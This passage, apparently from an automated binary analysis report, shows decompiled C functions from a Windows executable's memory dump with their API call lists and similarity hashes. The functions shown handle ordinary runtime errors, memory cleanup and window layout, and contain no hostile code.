                                                                        						}
                                                                        						_t24 = 1;
                                                                        					}
                                                                        				} else {
                                                                        					 *0x496aac = E00427218(4, _t23,  *0x496aac, _t27, _t29);
                                                                        					_t24 = GetMonitorInfoA(_t27, _t29);
                                                                        				}
                                                                        				return _t24;
                                                                        			}

                                                                        APIs
                                                                        • GetMonitorInfoA.USER32(?,?), ref: 00427579
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004275A0
                                                                        • GetSystemMetrics.USER32 ref: 004275B5
                                                                        • GetSystemMetrics.USER32 ref: 004275C0
                                                                        • lstrcpy.KERNEL32(?,DISPLAY), ref: 004275EA
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                        • String ID: DISPLAY$GetMonitorInfo
                                                                        • API String ID: 1539801207-1633989206
                                                                        • Opcode ID: 1644f9ef54712b8acc15ff1c2dbde6ccff60e967c01c1c93aa83ca6663675b5d
                                                                        • Instruction ID: 6783ea58f697a8443343b13a6c264d2348319dbac4baab090155d0615a0f433e
                                                                        • Opcode Fuzzy Hash: 1644f9ef54712b8acc15ff1c2dbde6ccff60e967c01c1c93aa83ca6663675b5d
                                                                        • Instruction Fuzzy Hash: 0A1106727047116FD720CF65AC447A7F7A9EB17320F50853BFC06A7A40D7B9A8408BA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 71%
                                                                        			E00401B64() {
                                                                        				void* _t2;
                                                                        				void* _t3;
                                                                        				void* _t14;
                                                                        				intOrPtr* _t19;
                                                                        				intOrPtr _t23;
                                                                        				intOrPtr _t26;
                                                                        				intOrPtr _t28;
                                                                        
                                                                        				_t26 = _t28;
                                                                        				if( *0x4965bc == 0) {
                                                                        					return _t2;
                                                                        				} else {
                                                                        					_push(_t26);
                                                                        					_push("�1!");
                                                                        					_push( *[fs:edx]);
                                                                        					 *[fs:edx] = _t28;
                                                                        					if( *0x496049 != 0) {
                                                                        						_push(0x4965c4);
                                                                        						L004013FC();
                                                                        					}
                                                                        					 *0x4965bc = 0;
                                                                        					_t3 =  *0x49661c; // 0x69cc50
                                                                        					LocalFree(_t3);
                                                                        					 *0x49661c = 0;
                                                                        					_t19 =  *0x4965e4; // 0x69c334
                                                                        					while(_t19 != 0x4965e4) {
                                                                        						VirtualFree( *(_t19 + 8), 0, 0x8000);
                                                                        						_t19 =  *_t19;
                                                                        					}
                                                                        					E00401464(0x4965e4);
                                                                        					E00401464(0x4965f4);
                                                                        					E00401464(0x496620);
                                                                        					_t14 =  *0x4965dc; // 0x69bd00
                                                                        					while(_t14 != 0) {
                                                                        						 *0x4965dc =  *_t14;
                                                                        						LocalFree(_t14);
                                                                        						_t14 =  *0x4965dc; // 0x69bd00
                                                                        					}
                                                                        					_pop(_t23);
                                                                        					 *[fs:eax] = _t23;
                                                                        					_push(0x401c41);
                                                                        					if( *0x496049 != 0) {
                                                                        						_push(0x4965c4);
                                                                        						L00401404();
                                                                        					}
                                                                        					_push(0x4965c4);
                                                                        					L0040140C();
                                                                        					return 0;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        • RtlEnterCriticalSection.KERNEL32(004965C4,00000000,1!), ref: 00401B91
                                                                        • LocalFree.KERNEL32(0069CC50,00000000,1!), ref: 00401BA3
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,0069CC50,00000000,1!), ref: 00401BC2
                                                                        • LocalFree.KERNEL32(0069BD00,?,00000000,00008000,0069CC50,00000000,1!), ref: 00401C01
                                                                        • RtlLeaveCriticalSection.KERNEL32(004965C4,00401C41,0069CC50,00000000,1!), ref: 00401C2A
                                                                        • RtlDeleteCriticalSection.KERNEL32(004965C4,00401C41,0069CC50,00000000,1!), ref: 00401C34
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                        • String ID: 1!
                                                                        • API String ID: 3782394904-1845855088
                                                                        • Opcode ID: 3a7b233517acf5c95cbb18c7fe32d53daa30e1684477b17213130cd6556bc65b
                                                                        • Instruction ID: 05849b501fd87baf2c0356682b7521c0f28bcc268fec1476372dd4ef7659d9e7
                                                                        • Opcode Fuzzy Hash: 3a7b233517acf5c95cbb18c7fe32d53daa30e1684477b17213130cd6556bc65b
                                                                        • Instruction Fuzzy Hash: 10118E706483806EEB11AB66AC81B167B999714718F17807BF404A66FAD67D9C40CB1D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040A0C8(void* __edi) {
                                                                        				void _v1024;
                                                                        				char _v1088;
                                                                        				long _v1092;
                                                                        				void* _t10;
                                                                        				char* _t12;
                                                                        				intOrPtr _t14;
                                                                        				intOrPtr _t16;
                                                                        				intOrPtr _t22;
                                                                        				long _t26;
                                                                        				void* _t34;
                                                                        
                                                                        				E00409F40(_t10,  &_v1024, _t34, 0x400);
                                                                        				_t12 =  *0x495b34; // 0x496048
                                                                        				if( *_t12 == 0) {
                                                                        					_t14 =  *0x495914; // 0x40759c
                                                                        					_t7 = _t14 + 4; // 0xffe8
                                                                        					_t16 =  *0x496714; // 0x400000
                                                                        					LoadStringA(E00405AAC(_t16),  *_t7,  &_v1088, 0x40);
                                                                        					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                                                                        				}
                                                                        				_t22 =  *0x49595c; // 0x496218
                                                                        				E00402D34(_t22);
                                                                        				_t26 = E00408BF8( &_v1024, __edi);
                                                                        				WriteFile(GetStdHandle(0xfffffff5),  &_v1024, _t26,  &_v1092, 0);
                                                                        				return WriteFile(GetStdHandle(0xfffffff5), 0x40a178, 2,  &_v1092, 0);
                                                                        			}














                                                                        APIs
                                                                          • Part of subcall function 00409F40: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F5D
                                                                          • Part of subcall function 00409F40: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F81
                                                                          • Part of subcall function 00409F40: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F9C
                                                                          • Part of subcall function 00409F40: LoadStringA.USER32 ref: 0040A032
                                                                        • GetStdHandle.KERNEL32(000000F5,?,00000000,?,00000000), ref: 0040A108
                                                                        • WriteFile.KERNEL32(00000000,000000F5,?,00000000,?,00000000), ref: 0040A10E
                                                                        • GetStdHandle.KERNEL32(000000F5,0040A178,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A123
                                                                        • WriteFile.KERNEL32(00000000,000000F5,0040A178,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A129
                                                                        • LoadStringA.USER32 ref: 0040A14B
                                                                        • MessageBoxA.USER32 ref: 0040A161
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: File$HandleLoadModuleNameStringWrite$MessageQueryVirtual
                                                                        • String ID: H`I
                                                                        • API String ID: 1802973324-3946158073
                                                                        • Opcode ID: 46a409c553fa7b0eaac4b9152b14505e0718eae20c8bb15c3c42cbfd28e4cb2f
                                                                        • Instruction ID: 164a82ec87427e02c43d68d6289cc30817225284fd7a8bc5127b03f5bcef9bb4
                                                                        • Opcode Fuzzy Hash: 46a409c553fa7b0eaac4b9152b14505e0718eae20c8bb15c3c42cbfd28e4cb2f
                                                                        • Instruction Fuzzy Hash: 46016DB1614300AAE200F7A4CC46F9B77EC9B45718F50463BB755FA0E2DA78E9148B3B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E004041CC(void* __ecx) {
                                                                        				long _v4;
                                                                        				int _t3;
                                                                        
                                                                        				if( *0x496048 == 0) {
                                                                        					if( *0x47a01c == 0) {
                                                                        						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                                        					}
                                                                        					return _t3;
                                                                        				} else {
                                                                        					if( *0x49621c == 0xd7b2 &&  *0x496224 > 0) {
                                                                        						 *0x496234();
                                                                        					}
                                                                        					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                                        					return WriteFile(GetStdHandle(0xfffffff5), E00404254, 2,  &_v4, 0);
                                                                        				}
                                                                        			}






                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,004798C4,00000000,?,0040429A,?,?,?,00000001,0040433A,00402863,004028AB,?,00000000), ref: 00404205
                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,004798C4,00000000,?,0040429A,?,?,?,00000001,0040433A,00402863,004028AB), ref: 0040420B
                                                                        • GetStdHandle.KERNEL32(000000F5,00404254,00000002,004798C4,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,004798C4,00000000,?,0040429A), ref: 00404220
                                                                        • WriteFile.KERNEL32(00000000,000000F5,00404254,00000002,004798C4,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,004798C4,00000000,?,0040429A), ref: 00404226
                                                                        • MessageBoxA.USER32 ref: 00404244
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileHandleWrite$Message
                                                                        • String ID: Error$Runtime error at 00000000
                                                                        • API String ID: 1570097196-2970929446
                                                                        • Opcode ID: 4761f131ddf98c97f3b1034989d57503ea3da9a4de15842b6ca85224d8e130d7
                                                                        • Instruction ID: 196c44c3e04e492743d3cd85247e7e05a160b8e68fe7c0a1ee4f43ec710e7497
                                                                        • Opcode Fuzzy Hash: 4761f131ddf98c97f3b1034989d57503ea3da9a4de15842b6ca85224d8e130d7
                                                                        • Instruction Fuzzy Hash: FEF0BBA078438075FA2077649D07F9E224C47D1F19F604AFFB314B40E286BC44C4572E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E0042EE4C(void* __eax, void* __ecx, void* __edx) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				intOrPtr _v20;
                                                                        				signed int _v24;
                                                                        				struct HDWP__* _v28;
                                                                        				int _v32;
                                                                        				char _v36;
                                                                        				struct tagTEXTMETRICA _v92;
                                                                        				void* __ebx;
                                                                        				void* __ebp;
                                                                        				struct HDC__* _t85;
                                                                        				void* _t88;
                                                                        				void* _t111;
                                                                        				char _t115;
                                                                        				intOrPtr* _t117;
                                                                        				void* _t142;
                                                                        				signed int _t145;
                                                                        				long _t146;
                                                                        				signed int _t156;
                                                                        				intOrPtr _t158;
                                                                        				struct HDC__* _t173;
                                                                        				int _t174;
                                                                        				void* _t177;
                                                                        				void* _t179;
                                                                        				intOrPtr _t180;
                                                                        				intOrPtr _t186;
                                                                        
                                                                        				_t177 = _t179;
                                                                        				_t180 = _t179 + 0xffffffa8;
                                                                        				_t142 = __eax;
                                                                        				_t85 =  *(__eax + 0x210);
                                                                        				if( *((intOrPtr*)(_t85 + 8)) == 0 ||  *((char*)(__eax + 0x220)) != 0) {
                                                                        					return _t85;
                                                                        				} else {
                                                                        					_push(0);
                                                                        					L00406EB4();
                                                                        					_t173 = _t85;
                                                                        					_t88 = SelectObject(_t173, E0041F478( *((intOrPtr*)(__eax + 0x68)), __eax, __ecx));
                                                                        					GetTextMetricsA(_t173,  &_v92);
                                                                        					SelectObject(_t173, _t88);
                                                                        					_push(_t173);
                                                                        					_push(0);
                                                                        					L00407124();
                                                                        					_t174 =  *( *((intOrPtr*)(_t142 + 0x210)) + 8);
                                                                        					_t145 =  *(_t142 + 0x21c);
                                                                        					asm("cdq");
                                                                        					_v8 = (_t174 + _t145 - 1) / _t145;
                                                                        					asm("cdq");
                                                                        					_v12 = ( *((intOrPtr*)(_t142 + 0x48)) - 0xa) / _t145;
                                                                        					_t146 = _v92.tmHeight;
                                                                        					_v24 =  *((intOrPtr*)(_t142 + 0x4c)) - _t146 - 5;
                                                                        					asm("cdq");
                                                                        					_v16 = _v24 / _v8;
                                                                        					asm("cdq");
                                                                        					_t34 = _v24 % _v8;
                                                                        					_t156 = _t34 >> 1;
                                                                        					if(_t34 < 0) {
                                                                        						asm("adc edx, 0x0");
                                                                        					}
                                                                        					_v20 = _t156 + _t146 + 1;
                                                                        					_v28 = BeginDeferWindowPos(_t174);
                                                                        					_push(_t177);
                                                                        					_push(0x42efd5);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t180;
                                                                        					_t111 =  *( *((intOrPtr*)(_t142 + 0x210)) + 8) - 1;
                                                                        					if(_t111 >= 0) {
                                                                        						_t115 = _t111 + 1;
                                                                        						_t186 = _t115;
                                                                        						_v36 = _t115;
                                                                        						_v24 = 0;
                                                                        						do {
                                                                        							_t117 = E00414208( *((intOrPtr*)(_t142 + 0x210)), _v24);
                                                                        							_t170 = _t117;
                                                                        							 *((intOrPtr*)( *_t117 + 0x70))();
                                                                        							asm("cdq");
                                                                        							_v32 = _v24 / _v8 * _v12 + 8;
                                                                        							if(E004037D8(_t117, _t186) != 0) {
                                                                        								_v32 = E00435FB0(_t142) - _v32 - _v12;
                                                                        							}
                                                                        							asm("cdq");
                                                                        							_v28 = DeferWindowPos(_v28, E0043CC2C(_t170), 0, _v32, _v24 % _v8 * _v16 + _v20, _v12, _v16, 0x14);
                                                                        							E004364CC(_t170, 1);
                                                                        							_v24 = _v24 + 1;
                                                                        							_t81 =  &_v36;
                                                                        							 *_t81 = _v36 - 1;
                                                                        						} while ( *_t81 != 0);
                                                                        					}
                                                                        					_pop(_t158);
                                                                        					 *[fs:eax] = _t158;
                                                                        					_push(0x42efdc);
                                                                        					return EndDeferWindowPos(_v28);
                                                                        				}
                                                                        			}































                                                                        APIs
                                                                        • 72E7AC50.USER32(00000000), ref: 0042EE76
                                                                          • Part of subcall function 0041F478: CreateFontIndirectA.GDI32(?), ref: 0041F5B6
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042EE87
                                                                        • GetTextMetricsA.GDI32(00000000,?), ref: 0042EE93
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042EE9A
                                                                        • 72E7B380.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042EEA2
                                                                        • BeginDeferWindowPos.USER32 ref: 0042EEFA
                                                                        • DeferWindowPos.USER32(?,00000000,00000000,?,?,?,00000000,?), ref: 0042EFA1
                                                                        • EndDeferWindowPos.USER32(?,0042EFDC,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042EFCF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: DeferWindow$ObjectSelect$B380BeginCreateFontIndirectMetricsText
                                                                        • String ID:
                                                                        • API String ID: 2543476052-0
                                                                        • Opcode ID: 218aff618e0d1c92c010e9e46c08f2c33b00da450782674677ceb1564e956cea
                                                                        • Instruction ID: f4d01097e73c3804610282b1e03a132fba9f815ae9591d249fd19601606493d4
                                                                        • Opcode Fuzzy Hash: 218aff618e0d1c92c010e9e46c08f2c33b00da450782674677ceb1564e956cea
                                                                        • Instruction Fuzzy Hash: B6414271A00119AFDB00DFA9C985AEEBBF5EF48304F154066F904E7391D7389D41CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 74%
                                                                        			E0045325C(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                        				intOrPtr* _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				short _v22;
                                                                        				intOrPtr _v28;
                                                                        				struct HWND__* _v32;
                                                                        				char _v36;
                                                                        				intOrPtr _t50;
                                                                        				intOrPtr _t58;
                                                                        				intOrPtr _t59;
                                                                        				intOrPtr _t60;
                                                                        				intOrPtr _t63;
                                                                        				intOrPtr _t64;
                                                                        				intOrPtr _t66;
                                                                        				intOrPtr _t68;
                                                                        				intOrPtr _t83;
                                                                        				void* _t88;
                                                                        				intOrPtr _t120;
                                                                        				void* _t122;
                                                                        				void* _t125;
                                                                        				void* _t126;
                                                                        				intOrPtr _t127;
                                                                        
                                                                        				_t123 = __esi;
                                                                        				_t122 = __edi;
                                                                        				_t125 = _t126;
                                                                        				_t127 = _t126 + 0xffffffe0;
                                                                        				_push(__ebx);
                                                                        				_push(__esi);
                                                                        				_v36 = 0;
                                                                        				_v8 = __eax;
                                                                        				_push(_t125);
                                                                        				_push(0x4534ec);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t127;
                                                                        				E00434E0C();
                                                                        				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2ec) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
                                                                        					_t50 =  *0x495a24; // 0x41d59c
                                                                        					E00406548(_t50,  &_v36);
                                                                        					E0040A17C(_v36, 1);
                                                                        					E00403DA8();
                                                                        				}
                                                                        				if(GetCapture() != 0) {
                                                                        					SendMessageA(GetCapture(), 0x1f, 0, 0);
                                                                        				}
                                                                        				ReleaseCapture();
                                                                        				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000008;
                                                                        				_v32 = GetActiveWindow();
                                                                        				_t58 =  *0x47aaf8; // 0x0
                                                                        				_v20 = _t58;
                                                                        				_t59 =  *0x496c08; // 0x215094c
                                                                        				_t60 =  *0x496c08; // 0x215094c
                                                                        				E00414284( *((intOrPtr*)(_t60 + 0x7c)),  *((intOrPtr*)(_t59 + 0x78)), 0);
                                                                        				_t63 =  *0x496c08; // 0x215094c
                                                                        				 *((intOrPtr*)(_t63 + 0x78)) = _v8;
                                                                        				_t64 =  *0x496c08; // 0x215094c
                                                                        				_v22 =  *((intOrPtr*)(_t64 + 0x44));
                                                                        				_t66 =  *0x496c08; // 0x215094c
                                                                        				E004546C4(_t66,  *((intOrPtr*)(_t59 + 0x78)), 0);
                                                                        				_t68 =  *0x496c08; // 0x215094c
                                                                        				_v28 =  *((intOrPtr*)(_t68 + 0x48));
                                                                        				_v16 = E0044D650(0, 0x496c04, _t122, _t123);
                                                                        				_push(_t125);
                                                                        				_push(0x4534cc);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t127;
                                                                        				E004531AC(_v8);
                                                                        				_push(_t125);
                                                                        				_push(0x45342b);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t127;
                                                                        				SendMessageA(E0043CC2C(_v8), 0xb000, 0, 0);
                                                                        				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
                                                                        				do {
                                                                        					E004563FC( *0x496c04, _t122, _t123);
                                                                        					if( *((char*)( *0x496c04 + 0x9c)) == 0) {
                                                                        						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
                                                                        							E0045310C(_v8);
                                                                        						}
                                                                        					} else {
                                                                        						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
                                                                        					}
                                                                        					_t83 =  *((intOrPtr*)(_v8 + 0x24c));
                                                                        				} while (_t83 == 0);
                                                                        				_v12 = _t83;
                                                                        				SendMessageA(E0043CC2C(_v8), 0xb001, 0, 0);
                                                                        				_t88 = E0043CC2C(_v8);
                                                                        				if(_t88 != GetActiveWindow()) {
                                                                        					_v32 = 0;
                                                                        				}
                                                                        				_pop(_t120);
                                                                        				 *[fs:eax] = _t120;
                                                                        				_push(0x453432);
                                                                        				return E004531A4();
                                                                        			}

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                        • String ID:
                                                                        • API String ID: 862346643-0
                                                                        • Opcode ID: d23c847d7f57aea184321512c31775f2395633f8dc318a8c35cf2f43c479741c
                                                                        • Instruction ID: 1e7db2e0920272a233e48265ae69c26bb7b820731f5faa072b4b138cd3cd441e
                                                                        • Opcode Fuzzy Hash: d23c847d7f57aea184321512c31775f2395633f8dc318a8c35cf2f43c479741c
                                                                        • Instruction Fuzzy Hash: A8512E30A006449FDB00EF6AC946B9E77F5EF49745F1140BAF804AB3A2D778AE44DB48
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0043AD08(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				int _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v20;
                                                                        				struct tagRECT _v36;
                                                                        				signed int _t54;
                                                                        				intOrPtr _t59;
                                                                        				int _t61;
                                                                        				void* _t63;
                                                                        				void* _t66;
                                                                        				void* _t82;
                                                                        				int _t98;
                                                                        				struct HDC__* _t99;
                                                                        
                                                                        				_t99 = __edx;
                                                                        				_t82 = __eax;
                                                                        				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
                                                                        				_v16 = SaveDC(__edx);
                                                                        				E00434EE8(__edx, _a4, __ecx);
                                                                        				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                                                                        				_t98 = 0;
                                                                        				_v12 = 0;
                                                                        				if((GetWindowLongA(E0043CC2C(_t82), 0xffffffec) & 0x00000002) == 0) {
                                                                        					_t54 = GetWindowLongA(E0043CC2C(_t82), 0xfffffff0);
                                                                        					__eflags = _t54 & 0x00800000;
                                                                        					if((_t54 & 0x00800000) != 0) {
                                                                        						_v12 = 3;
                                                                        						_t98 = 0xa00f;
                                                                        					}
                                                                        				} else {
                                                                        					_v12 = 0xa;
                                                                        					_t98 = 0x200f;
                                                                        				}
                                                                        				if(_t98 != 0) {
                                                                        					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                                                                        					DrawEdge(_t99,  &_v36, _v12, _t98);
                                                                        					E00434EE8(_t99, _v36.top, _v36.left);
                                                                        					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
                                                                        				}
                                                                        				E00437760(_t82, _t99, 0x14, 0);
                                                                        				E00437760(_t82, _t99, 0xf, 0);
                                                                        				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
                                                                        				if(_t59 == 0) {
                                                                        					L12:
                                                                        					_t61 = RestoreDC(_t99, _v16);
                                                                        					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
                                                                        					return _t61;
                                                                        				} else {
                                                                        					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
                                                                        					if(_t63 < 0) {
                                                                        						goto L12;
                                                                        					}
                                                                        					_v20 = _t63 + 1;
                                                                        					_v8 = 0;
                                                                        					do {
                                                                        						_t66 = E00414208( *((intOrPtr*)(_t82 + 0x19c)), _v8);
                                                                        						_t107 =  *((char*)(_t66 + 0x57));
                                                                        						if( *((char*)(_t66 + 0x57)) != 0) {
                                                                        							E0043AD08(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
                                                                        						}
                                                                        						_v8 = _v8 + 1;
                                                                        						_t36 =  &_v20;
                                                                        						 *_t36 = _v20 - 1;
                                                                        					} while ( *_t36 != 0);
                                                                        					goto L12;
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                        • SaveDC.GDI32 ref: 0043AD1E
                                                                          • Part of subcall function 00434EE8: GetWindowOrgEx.GDI32(?), ref: 00434EF6
                                                                          • Part of subcall function 00434EE8: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 00434F0C
                                                                        • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043AD3F
                                                                        • GetWindowLongA.USER32 ref: 0043AD55
                                                                        • GetWindowLongA.USER32 ref: 0043AD77
                                                                        • SetRect.USER32 ref: 0043ADA3
                                                                        • DrawEdge.USER32(?,?,?,00000000), ref: 0043ADB2
                                                                        • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043ADD7
                                                                        • RestoreDC.GDI32(?,?), ref: 0043AE48
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                        • String ID:
                                                                        • API String ID: 2976466617-0
                                                                        • Opcode ID: 7579a09f0e1fb688d0282343193c5f5ef11fca35c4dbc9b8d67e96162047c833
                                                                        • Instruction ID: 5230efab144cf00d1e86c4fe0b99e01b1b6c0be5c34e2f34689cb1fb78e5a635
                                                                        • Opcode Fuzzy Hash: 7579a09f0e1fb688d0282343193c5f5ef11fca35c4dbc9b8d67e96162047c833
                                                                        • Instruction Fuzzy Hash: 98417171B002056BDB10EBA9CC81FAF77A9AF48304F10516AF905EB396DB79DD0187A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0045DC38(void* __eax, void* __edx, void* __edi, void* __esi) {
                                                                        				char _v12;
                                                                        				int _v24;
                                                                        				int _v28;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				int _t53;
                                                                        				int _t55;
                                                                        				signed int _t60;
                                                                        				signed int _t63;
                                                                        				int _t82;
                                                                        				int _t84;
                                                                        				signed int _t89;
                                                                        				signed int _t92;
                                                                        				void* _t97;
                                                                        				void* _t113;
                                                                        
                                                                        				_t97 = __eax;
